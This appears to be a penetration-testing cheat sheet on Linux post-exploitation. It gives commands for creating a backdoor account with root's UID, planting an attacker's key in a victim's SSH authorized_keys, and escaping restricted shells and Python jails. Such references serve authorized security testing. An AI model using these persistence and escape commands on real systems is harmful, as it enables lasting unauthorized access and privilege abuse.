Linux

Introduction

In this section, you will find several useful commands for the Post-Exploitation phase in Linux systems.

User

Creating a user

sudo useradd [-m] <USERNAME>

Add a user to a group

sudo usermod -aG <GROUP> <USERNAME>

Create an alternative root user

useradd -m -ou 0 -g 0 -p <ENCRYPTED_PASSWORD> -s /bin/bash <USERNAME>

Login through SSH

There are times when we have a remote terminal as a user but we want to have access as that user via SSH although we do not know their password. SSH keys are used for these cases.

1. Generate a SSH key pair.

kali@kali:~$ ssh-keygen 
Generating public/private rsa key pair.
Enter file in which to save the key (/home/kali/.ssh/id_rsa): 
Enter passphrase (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in /home/kali/.ssh/id_rsa
Your public key has been saved in /home/kali/.ssh/id_rsa.pub
[...]

1. Add the public key to the victim's file ~/.ssh/authorized_keys:

echo -e "\n<PUB_KEY>\n" >> ~/.ssh/authorized_keys

1. Log in.

ssh -i ~/.ssh/id_rsa <USERNAME>@<IP>

Shell Escapes

It could be the case that you have obtained access to a restricted shell allowing you to perform a minimal amount of commands and preventing you from accessing other directories or files.

In this section, you will find some ways to escape those restricted shells.

SSH

ssh <USERNAME>@<TARGET_I -t "bash --noprofile -i"

Python Jail

echo os.system('/bin/bash')

For more examples of how to escape restricted shells, read the following articles.

• rbash escape | rbash restricted shell escape

• Escaping Restricted Linux Shells

• Escaping python jails